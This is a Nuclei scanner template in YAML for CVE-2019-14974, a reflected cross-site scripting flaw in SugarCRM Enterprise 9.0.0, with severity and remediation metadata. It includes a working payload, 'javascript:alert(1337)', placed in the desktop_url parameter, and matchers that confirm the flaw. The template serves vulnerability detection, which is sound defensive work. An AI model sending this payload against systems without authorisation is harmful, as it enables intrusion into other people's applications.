47 lines
1.8 KiB
YAML
47 lines
1.8 KiB
YAML
id: CVE-2019-14974
|
|
|
|
info:
|
|
name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting
|
|
author: madrobot
|
|
severity: medium
|
|
description: SugarCRM Enterprise 9.0.0 contains a cross-site scripting vulnerability via mobile/error-not-supported-platform.html?desktop_url.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
|
|
remediation: |
|
|
Apply the latest security patch or upgrade to a non-vulnerable version of SugarCRM Enterprise.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/47247
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-14974
|
|
- https://github.com/anonymous364872/Rapier_Tool
|
|
- https://github.com/merlinepedra/nuclei-templates
|
|
- https://github.com/merlinepedra25/nuclei-templates
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2019-14974
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00217
|
|
epss-percentile: 0.5978
|
|
cpe: cpe:2.3:a:sugarcrm:sugarcrm:9.0.0:*:*:*:enterprise:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: sugarcrm
|
|
product: sugarcrm
|
|
tags: cve,cve2019,xss,sugarcrm,edb
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "url = window.location.search.split(\"?desktop_url=\")[1]"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100de1ea85fd431dcd8f3710dc9c24563d0027f722f184b4918e1d0599db45abd49022019fbe12c1da0da06134f4134bcb5c5435a7cc1fd436f50463e1ee9a21232f57c:922c64590222798bb761d5b6d8e72950 |